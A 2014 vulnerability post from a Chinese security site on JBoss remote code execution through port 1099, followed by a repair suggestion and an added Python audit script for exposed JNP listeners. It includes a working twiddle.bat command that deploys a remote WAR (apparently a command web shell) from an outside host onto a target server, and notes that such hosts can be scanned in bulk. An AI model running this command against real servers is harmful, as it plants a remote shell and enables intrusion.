JBoss 1099 port remote method invocation vulnerability - Vulnerability Warning - MyHack58

ID MYHACK58:62201442130
Type myhack58
Reporter 空虚浪子心
Modified 2014-02-03T00:00:00


A few days ago, Bird sent me an article about a Java vulnerability: port 1099 allowing remote method invocation.

That reminded me of something. At XCON 2012 there was a problem I did not mention because I had "forgotten" it: a JBoss remote code execution vulnerability. Nobody in China seems to have translated it or written a usage guide. So much time has passed that I really had forgotten it. Its principle is almost the same as the EJBInvoker issue; the EJBInvoker vulnerability released a few days ago is in fact an old one, and both were published together back then. In practice the exploit differs only in the URL, but no domestic "usage guide" for this vulnerability has appeared, so many people cannot use it. The usage guide is as follows; whatever I leave out, Google it.

Vulnerability details:

twiddle.bat -s jnp://www.target.net:1099 invoke jboss.system:service=MainDeployer deploy http://www.inbreak.net/cmd.war

This actually comes from an article by a foreign researcher that covered it together with several other JBoss issues. It means a WAR can be deployed remotely; the underlying principle is essentially the same as EJBInvokerServlet / JMXInvokerServlet, and the fingerprinting characteristics are basically identical, so port 1099 can be scanned in bulk. In addition, JBoss port 4444 does not look healthy either, but I have had no time to analyse it and will wait for the answer. I think the saddest thing about the domestic security community is that in most cases "having a tool == a new vulnerability", so "exp == vulnerability details".

Repair recommendation: remove the invoker, then close port 1099.
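An added example, not part of the original post, for the defensive side of that recommendation: a small Python audit that reads a JBoss 4.x-style conf/jboss-service.xml and reports whether the JNP naming listener on 1099 is bound to every interface. The MBean and attribute names are modelled on JBoss 4.x, the sample document is constructed, and the "-1 disables the listener" convention and the fallback bind address are assumptions.

```python
"""Audit a JBoss 4.x-style conf/jboss-service.xml for an exposed JNP (1099) listener."""
import xml.etree.ElementTree as ET

NAMING_MBEAN = "jboss:service=Naming"   # NamingService MBean name, modelled on JBoss 4.x
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed sample: JNP on 1099 bound to every interface (the weak setting).
SAMPLE_CONFIG = """<server>
  <mbean code="org.jboss.naming.NamingService" name="jboss:service=Naming">
    <attribute name="Port">1099</attribute>
    <attribute name="BindAddress">0.0.0.0</attribute>
    <attribute name="RmiPort">1098</attribute>
  </mbean>
</server>"""


def naming_service_settings(xml_text):
    """Return {attribute: value} for the Naming MBean, or {} if it is not present."""
    root = ET.fromstring(xml_text)
    for mbean in root.iter("mbean"):
        if mbean.get("name") == NAMING_MBEAN:
            return {a.get("name"): (a.text or "").strip() for a in mbean.findall("attribute")}
    return {}


def jnp_exposure(xml_text, bind_address_default="0.0.0.0"):
    """Classify how reachable the JNP listener is.

    bind_address_default stands in for an unresolved ${jboss.bind.address}
    (assumption: older releases bound every interface unless -b was given).
    """
    attrs = naming_service_settings(xml_text)
    if not attrs:
        return "naming-service-absent"
    port = attrs.get("Port", "1099")
    bind = attrs.get("BindAddress", "${jboss.bind.address}")
    if bind.startswith("${"):
        bind = bind_address_default
    if port in ("-1", "0"):            # assumption: -1 means no bootstrap listener
        return "jnp-disabled"
    if bind in LOOPBACK:
        return "jnp-loopback-only"
    return f"jnp-exposed:{bind}:{port}"


if __name__ == "__main__":
    print(jnp_exposure(SAMPLE_CONFIG))
    print(jnp_exposure(SAMPLE_CONFIG.replace("0.0.0.0", "127.0.0.1")))
```

The hardened form is the same MBean with BindAddress set to 127.0.0.1 (or the listener removed entirely), which the second call classifies as loopback-only.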